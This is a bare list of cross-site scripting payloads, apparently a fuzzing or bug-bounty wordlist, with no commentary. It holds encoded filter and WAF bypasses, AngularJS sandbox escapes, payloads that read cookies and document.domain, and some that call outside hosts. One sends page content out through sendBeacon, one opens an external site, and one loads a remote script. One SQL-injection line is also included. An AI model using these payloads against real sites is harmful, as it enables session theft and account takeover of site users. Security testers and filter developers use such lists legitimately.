%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Djavascript%3Aalert%28%2FXSS%2F%29%22%3E

%3Cobject%20data%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3C%2Fobject%3E

%3Cscript%0Baaa%3Ealert%281%29%3C/script%3E

%3Cscript%0Caaaaa%3Ealert%28123%29%3C/script%0Caaaaa%3E

%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(/xss/)

%3Cscript%3E%60alert%60%28%2FXSS%2F%29%3B%3C%2Fscript%3E

3Cscript%3Ealert(1)%3C%2Fscript%3E

3Cscript%3Ealert(1)%3C%2Fscript%3E##1

%3cscript%3ealert(1)%3c/script>

%3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E

%3cscript%3ealert(1)%3c/script%3e

%3Cscript%3Ealert(1)%3C/script%3E

%3Cscript%3Ealert(1)%3C/script%3E##1

%3cscript%3ealert%281%29%3b%3c%2fscript%3e

%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2fscript%3E

%3cscript%3ealert()%3c/script>

%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E

#%3Cscript%3Ealert('XSS')%3C%2Fscript%3E

%3Cscript%3Ealert(`xss`)%3C/script%3E

%3Cscript%3Ealert('XSS')%3C/script%3E

%3Cscript%3Efor((TESTXSS)in(self))eval(TESTXSS)(`${`TESTXSS`}`)%3C/script%3E

%3Csvg%20onload%3D%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%28%26%231%3B%29%3E

%3Csvg%20onload%3D%60alert%28%2FXSS%2F%29%60%3E%3C%2Fsvg%3E

%3Csvg%20onload%3D%60alert%28%60XSS%60%29%60%3E

%3Csvg%20onload=alert(1)%3E

%3Csvg%2Fonload%3D'alert%26%2340%2023%20%26%2341'%3E

%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E

%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >

%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F

%3csvg/onload=window%5b%22al%22+%22ert%22%5d1337`%3e

%3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e

%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

%3Cx/Onpointerrawupdate=confirm%26lpar;)%3Exxxxx

%3E%3Cbody%20onload=javascript:alert(1)%3E

'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

"%3E<img src=x onerror=prompt(document.domain);%3E"

%3E'><script>alert(2);</script>

%3F%20<body onload=alert("bingo")>

%3F%20<img src=1 onerror=alert(1)>

%3F%20<img/src/onerror=alert(coffinxp`)>

%3F%20"><img src=q onerror=alert(1)>

%3F%20"><img src=x onerror=prompt(document.domain);>

%3F%20javascript:alert(1)

%3F%20<script>alert(1)</script>

%3F%20<script>prompt(document.domain)</script>

%3F%20"><svg onload=alert(1)>

444-555-4455 <img src=x onerror=alert(1)>

[45].some.alert()

/*!50000and*/ /*!50000extractvalue*/(0x0a,/*!50000concat(0x0a,(select JSON_OBJECT(1, current_user())))*/)

%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%28%29

%60%2balert/**/(1)%2b%60

&#60;body onload=alert('ibrahimxss')&#62;&#34;&#34;

&#60;script&#62;alert(1)&#60;/script&#62;

&#60;svg/onload=alert(1)&#62;

6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/

&#62;'&gt;"<script>alert(2);</script>

%7b%0a%20%20%22%64%61%74%61%22%3a%20%22%7b%74%65%78%74%3a%3c%69%6d%67%2f%73%72%63%3d%78%20%6f%6e%6c%6f%61%64%3d%63%6f%6e%66%69%72%6d%28%31%29%3e%7d%22%2c%0a%20%20%22%65%76%65%6e%74%49%44%22%3a%20%32%33%34%32%33%0a%7d

a<%00meta name="i" HTTP-EQUIV="refresh" CONTENT="0;url=data:text/h%00tml;base64,PHNjcmlwdD5hbGVydCgiT1BFTkJVR0JPVU5UWSIpOzwvc2NyaXB0Pg==">

"><A%20%252F=""Href=%20JavaScript:k='%22',top[k+'lert']('XSS')">

"><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)>

(A(%22onerror=%22alert%601%60%22))

(A(%22onerror='alert%60123%60'test))/

(A(%22onerror='alert%601%60'testabcd))/

<a2 onfocus=alert(1) autofocus tabindex=1>

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>

a=8,b=confirm,c=window,c.onerror=b;throw-a

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a>

aaaaa\”-confirm`1`//

"><a>a</a><img src=x onerror=alert(document.cookie)>{{9-9}}';alert(0);://

"aaa&#x3C;a href=javas&#x26;#99;ript:alert(1)&#x3E;click"

a'-alert(1)//

a=alert,a(1)

";(a=alert,b=1,a(b))

-(a=alert,b="_Y000!_",[b].find(a))-'

abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e

ABC<div style="x:expression\x5C(javascript:alert(1)">DEF

ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF

" accesskey='x' onclick='confirm`1`' //

<a @['c\lic\u{6b}']="_c.constructor('alert(1)')()">test</a>

{{'a'.constructor('alert(1)')()}}

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

{{'a'.constructor.constructor('alert(1)')()}}

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='"+(y='if(!window\u002ex)alert(window\u002ex=1)')+eval(y)+"'");}}}}

<acronym id=x tabindex=1 onfocus=alert(1)></acronym>

<a data-orig-ref="

alert(1)" data-orig-proto="javascript" href="javascript://

alert(1)">clickme</a>

[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

<address id=x tabindex=1 onfocus=alert(1)></address>

=a=document.domain;top["al"%2b"ert"](/%2a%2a/a)>

a=document.domain;top["al"%2b"ert"](/%2a%2a/a)>

+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-

a=”Fun”;b=”ction”;c=”ev”;d=”al(a”;e=”tob”;f=”(‘YWxlcnQoMSk=’))”;self[a+b](c+d+e+f)();

<a href="&#0000106avascript:alert(1)">XSS</a>

<a href=&#01javascript:alert(1)>

<a href="&#106;avascript:alert(2)">a</a>

<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>

</> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </>

<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>

<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20click%20here</a>

<a/href=&#74;ava%0a%0d%09script&colon;alert()>click

'"><A HRef=" AutoFocus OnFocus=top/**/?.'ale'%2B'rt'>"

'"><A HRef=" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a

<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">ugh</a>

<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

<a href="data:text/html;charset=utf-7;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=">Click Here</a> { Data URI XSS: data:text/html;charset=utf-7;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= (PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=) : <script>alert('XSS')</script> }

"<a href=""/*"">*/)});function+__MobileAppList(){alert(1)}//>"

<a href="/*">*/)});function+__MobileAppList(){alert(1)}//>

<A HREF="http://0102.0146.0007.00000223/">XSS</A>

<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>

<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>

<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />tap

<a/href="ja%0d%0avascr%0di%0apt:window['axlxexrt’ replace(/x/,")]()">CLICK ME

<a href="ja%0Dva%0Dscr%0Dipt:aler%0Dt(1)">

<a href=ja%26Tab%3bvasc%26Tab%3bript:prompt`1`>pwn</a>

<a/href="jav%09%0dascri%09%0dpt%26%23x0000000000000000000000000000000003a; alert%26%23x28;%26%23x29;'>CLICK

<a/href="jav%09ascr%09ipt:window[la\lert’]()">Click me!</a>

<a href="jav%0Dascript&colon;alert(1)">

<a href="jav&#65ascript:javascript:alert(1)">test1</a>

<a href="jav&#97ascript:javascript:alert(1)">test1</a>

<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>

<a href=javas%26#99;ript:prompt%26#x28document.domain)>xss

<a+href="javas&#99;ript&#35;alert(1);">

<a href=javas&#99;ript:alert(1)>

<a href="javascript&#0000058&#0000097lert('Successful XSS')">Click this link!</a>

<a href="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e">click me</a>

<a/href="javascript%0A%0D:alert()">

<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">

<a href="javascript:alert(1)">a</a>

<a href=javascript:alert(1)>click

<a href=”javas cript:alert(document.cookie)” >Testing.com </a>

<a/href=javascript&colon;alert()>click

<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>

<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>

<a href=javascript&colon;confirm(1)>

<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">

<a href="javascript:pro\u006dpt(document.cookie)">L1k0r</a>

<a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>

<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

<a href="javascript:x='%27-alert(1)-%27';">XSS</a>

<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>

<a/href="javas&#x63;ript:al&#x6c;rt()">CLICK ME

"><a href=jav&#x0D;ascript&colon;top[8680439..toString(30)](document.domain)>Click</a>

<a href="jav&#x61script:alert(3)">a</a>

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;">X</a>

<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">

<a href=[]" onmouseover=prompt(1)//">XYZ</a>

<a href='vbscript:MsgBox("Successful XSS")'>Click here</a>

<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="&#x6a;avascript:alert(1)">XSS</a>

<a href="&#X6A;avascript:alert(1)">XSS</a>

<a href=" &#x8; &#23; javascript:alert('Successful XSS')">Click this link!</a>

<a id=x tabindex=1 onfocus=alert(1)></a>

[a](j a v a s c r i p t:prompt(document.cookie))

[a](javascript:prompt(document.cookie))

[a](javascript:window.onerror=alert;throw%201)

”al”;b=”ert”;self[a+b]();

(alert)()

";alert(0);//

'-alert(0)-'

[alert][0].call(this,1)

"}]}';alert(1);{{'

#'-alert(1)-'

#"-alert(1)}//

#";alert(1);//

#\'-alert(1)//

#alert`1`

');alert(1)//

'-alert(1)-'

'-alert(1)//

'|alert(1)|'

('+'alert(1)+')();

(alert)(1)

+alert(1)+

-alert(1)-'

.alert(1);

/*alert(1)*/

; alert(1);//

"-alert(1)}//

";alert(1);//

\'-alert(1)//

{{{}.")));alert(1)//"}}

{}.")));alert(1)//";

alert(1)

alert?.(1)

alert`1`

""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y

;alert(123);

";alert(123);t="

#';alert(123);t='

';alert(123);t='

-alert(1)-&apos;

"])},alert(1));(function xss() {//

*/alert(1)">'onload="/*<svg/1='

`-alert(1)">'onload="`<svg/1='

'alert(1)'.replace(/.+/,eval)

>alert(1)</script>

*/alert(1)</script><script>/*

'>alert(1)</script><script/1='

["');alert('1’);//"]@xyz.xxx

-alert(23)/

alert`23`

"};alert(23);a={"a":

#alert(document['cookie'])

');alert(document.cookie)();//

';alert(document.cookie)//

'});alert(document.cookie);//'

{alert('document.cookie')}

alert(document['cookie'])

alert?.(document?.cookie)

"alert(document.cookie)['script'](2);"

';alert(document.domain)//

alert(document.domain)

';alert("ibrahimxss");//

alert##<script>prompt(1234)</script>

";alert(String.fromCharCode(88,83,83))

//";alert(String.fromCharCode(88,83,83))

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";

alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--

';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))

alert(String.fromCharCode(88))

alert = window["al"+"ert"]

'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}

\";alert('XSS');//

["');alert('xss');//"]@xyz.xxx

["');alert('XSS');//"]@xyz.xxx

"}]}';alert('You got XSSed')

al\u0065rt(1)

">a

amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=

&#60;script&#62;alert(1)&#60;/script&#62;

"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;amp;amp;gt;

"&amp;amp;amp;gt;&amp;amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;amp;gt;

"&amp;amp;amp;gt;&amp;amp;amp;lt;svg onload=alert(1)&amp;amp;amp;gt;

”&amp;amp;amp;gt;&amp;amp;amp;lt;svg onload=alert&amp;amp;amp;amp;#0000000040"1")&amp;amp;amp;gt;

"&amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;gt;

&amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;gt;

&amp;amp;amp;lt;img/src/onerror=alert(`coffinxp`)&amp;amp;amp;gt;

&amp;amp;amp;lt;script&amp;amp;amp;gt;alert(1)&amp;amp;amp;lt;/script&amp;amp;amp;gt;

"&amp;amp;gt;&amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;gt;

"&amp;amp;gt;&amp;amp;lt;svg onload=alert(1)&amp;amp;gt;

”&amp;amp;gt;&amp;amp;lt;svg onload=alert&amp;amp;amp;#0000000040"1")&amp;amp;gt;

"&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;

&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;

&amp;amp;lt;img/src/onerror=alert(`coffinxp`)&amp;amp;gt;

&amp;amp;lt;script&amp;amp;gt;alert(1)&amp;amp;lt;/script&amp;amp;gt;

"&amp;gt;&amp;lt;img src=x onerror=prompt(document.domain);&amp;gt;

"&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;

”&amp;gt;&amp;lt;svg onload=alert&amp;amp;#0000000040"1")&amp;gt;

"&amp;lt;img src=1 onerror=alert(1)&amp;gt;

&amp;lt;img src=1 onerror=alert(1)&amp;gt;

&amp;lt;img/src/onerror=alert(`coffinxp`)&amp;gt;

&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;

"&gt;&lt;img src=x onerror=prompt(document.domain);&gt;

"&gt;&lt;svg onload=alert(1)&gt;

”&gt;&lt;svg onload=alert&amp;#0000000040"1")&gt;

"&lt;img src=1 onerror=alert(1)&gt;

&lt;img src=1 onerror=alert(1)&gt;

&lt;img/src/onerror=alert(`coffinxp`)&gt;

&lt;script&gt;alert(1)&lt;/script&gt;

">

anything&callback=%22;alert%60XSS_POC_BY_SAAJAN_BHUJEL%60;%2f%2f

anything&callback=";alert`XSS_POC_BY_SAAJAN_BHUJEL`;//

anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz

anythinglr00alert(document.domain)uxldz

Click Here!

Click Here!

elcezeri!

(A("onerror='alert`1`'testabcd))/

 

xss

xxs link

xxs link

\xxs link\

\xxs link\

test

& apos;>alert(2);

  

";a=prompt,a()//

';a=prompt,a()//

";a=prompt,a(1)//

asdf"onload%3d"alert('Slax Was Here!')"asdf

asd"`> onpointerenter=x=prompt,x`XSS`

//?aspxerrorpath=alert(1)

XXX

">Click

?>Click

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\u002ex)alert(window\u002ex=1)')+eval(y)+"'");}}

a=`\u003c`,b=`\u003e`,location=`javascript:[].findIndex(dump)+(/${a}img src=# onerror=alert(1)${b}/.source)`

   

">

 

/* */

  

“autofocus onclick=’alert()’

“autofocus onclick=’alert()

" autofocus onfocus=alert(1)

"autofocus/onfocus=alert(1)//

"autofocus onfocus='alert(document.domain)'

autofocus ' onfocus='alert(document.domain)'

“autofocus onFocUs=’find(l\u{6F}cati\u{6F}n=`j&Tab;avascr&NewLine;ipt&colon;al&Tab;ert()`)’

" autofocus onkeyup="javascript:alert(123)

ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6

ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -@naglinagli

a

test

banner.swf?clickTAG=javascript:alert(1);//

  

%BCscript%BEalert(%A21%A2)%BC/script%BE

  

blah(""+new class b{toString=e=>location=name}+"")

#blalala');alert(1);('a

blalala');alert(1);('a

click

dragme

Right click me<!--

<body background="javascript:alert('Successful XSS')">

<BODY BACKGROUND="javascript:alert('XSS')">

<body language=vbs onload=confirm-1

<body onactivate=alert(1)>

<body onbeforeprint=console.log(1)>

"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">

><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">

<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>

<body onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>

<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>

<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>

<body onfocusin=alert(1)>

<body onhashchange="print()">

<body oninput=javascript:alert(1)><input autofocus>

<body oninput=javascript:alert(/AmoloHT/)><input autofocus>

<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>

<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>

"<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert(“XSS”)>"

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>

<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>

#<body onload=alert(“bingo”)>

<body onload=alert(“bingo”)>

#<body onload="alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<body onload=alert(/XSS/.source)>

<body onload body onload="javascript:javascript:alert(1)"></body onload>

<body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">

<BODY ONLOAD=javascript:alert(1)>

<BODY ONLOAD=javascript:javascript:alert(1)>

<body/onload=&lt;!--&gt;&#10alert(1)>

"<body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>"

""><body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>",

<body onload="window.alert('XSS_WAF_BYPASS')">

"><body/onload="{x:onerror=alert};x"

"><body/onload="{x:onerror=alert};x"

<body onmessage=print()>

<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>

<body onorientationchange=alert(1)>

<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>

<body onpageshow=alert(1)>

"><body/oNpagEshoW=(confirm)(document.domain)>

"/><body onpageshow-prompt`assassin`//

<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>

<body onpopstate=print()>

<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>

<body onresize="print()">

{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}

<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>

<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

<body ontouchend=alert(1)>

<body ontouchmove=alert(1)>

<body ontouchstart=alert(1)>

<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>

breakout"/href="javas%26%23x63 ;ript:selffalx\ert%'.replace(/x/,"]()"

<BR SIZE="&{alert('XSS')}">

<BR SIZE="&{javascript:alert(1)}">

</br style=a:expression(alert(1))>

<brute+onbeforescriptexecute=a=alert,a(1%26%23x29>

<b <script>alert(1)</script>0

'+ '</b><script>alert(document.cookie)</script><b><!--'

</b><script>alert(document.cookie)</script><b><!--

<button autofocus onfocus=alert(1)>test</button>

<button autofocus onfocus=confirm(2)>

<button formaction="javascript:alert('XSS')">Click me</button>

<button onClick="alert('xss')">Submit</button>

%c0″//(0000%0dconfirm(1)//

%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE

{{c=%27%27.sub.call;b=%27%27.sub.bind;a=%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync(%22astNode=pop();astNode.type=%27UnaryExpression%27;astNode.operator=%27(window.X?void0:(window.X=true,alert(document.domain)))+%27;astNode.argument={type:%27Identifier%27,name:%27foo%27};%22);m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a=%27%27.sub;$eval(%27a(b.c)%27);[].push.apply=a;}}

{{c='%27%27.sub.call;b='%27%27.sub.bind;a='%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync('alert(document.domain)');m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a='%27%27.sub;$eval('a(b.c)'):[].push.apply=a:}}

{{c='%27%27.sub.call;b='%27%27.sub.bind;a='%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?voide:(window.X=true,alert(document.domain)))+';astNode.argument={type:'Identifier',name:'foo'};");m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a='%27%27.sub;$eval('a(b.c)'):[].push.apply=a:}}

{{c='%27%27.sub.call;b='%27%27.sub.bind;a='%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync('prompt("Enter something:", document.domain)');m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a='%27%27.sub;$eval('a(b.c)'):[].push.apply=a:}}

"));}catch(e){confirm(document.domain);}//

"));}catch(e){confirm(document.domain)}//

;"))}catch(e) {confirm(document.location);}//

;\"))}catch(e) {confirm(document.location);}//

"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//

"));}catch(e){x=window.open('http://xss.cx/');setTimeout('confirm(x.document.body.innerText)',4000)}//

{{_c.constructor('alert(1)')()}}

'`"><*chr*script>log(*num*)</script>

coffinxp"*alert(1)*"

<command onclick="alert('XSS')">Command</command>

//comment%0a%0dalert(0);

<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">

<comment><img src="</comment><img src=x onerror=javascript:alert(/AmoloHT/))//">

<component is=script text=alert(1)>

"-confirm(1)-"

#'-confirm(1)-

#*/confirm(1)

');confirm(1);//

'-confirm(1)-

\');confirm(1);//

\”-confirm`1`//

\”}})})-confirm`1`;({{/*///

confirm?.(1)

\”}})})-confirm`1`(a=>{({b:{/*///

\”}})})-confirm`1`;(function(){({if(){/*///

confirm(1)".replace(/.+/,eval)//

confirm(1)>>>/xss

'+confirm(9)&&null=='

'-confirm(document.cookie)-'

#'confirm(document.domain)'>

'-confirm(document.domain)-'

'confirm(document.domain)'>

-(confirm)(document.domain)//

";confirm(document.location);//

confirm(document.location)

confirm(document.selection.createRange().getBookmark())

confirm(location.hostname)

';confirm(String.fromCharCode(88,83,83))//';confirm(String.fromCharCode(88,83,83))//";

confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//--

confirm(window.toStaticHTML('<base href="http://xss.cx/"></base>'));

confirm(window.toStaticHTML('<label style="overflow:hidden;background:red;display:block;width:4000px;height:4000px;position:absolute;top:0px;left:0px;" for="submit">Click'));

confirm(window.toStaticHTML('<marquee>foo</marquee>'));

confirm(<xss>xs{[function::status]}s</xss>)

<c/onpointerrawupdate=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb>

console.log(document.domain)

{{constructor.constructor(‘a=document;confirm(a.domain)’)()}}

{{constructor.constructor("alert(0)")()}}

#{{constructor.constructor(alert`1`)()}}

#constructor.constructor('alert(1)')()

{{''.constructor.constructor('alert(1)')()}}

{{constructor.constructor('alert(1)')()}}

{{constructor.constructor(‘alert(1)’)()}}

{{constructor.constructor(alert`1`)()}}

constructor.constructor('alert(1)')()

[[constructor.constructor('alert(document.cookie)')()]]

{{{{constructor.constructor('alert("XSS")')()}}

{{constructor.constructor('alert(/XSS Stored!/)')()}}

{{constructor.constructor('eval(atob(\'amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5jb29raWUp\'))')()}}

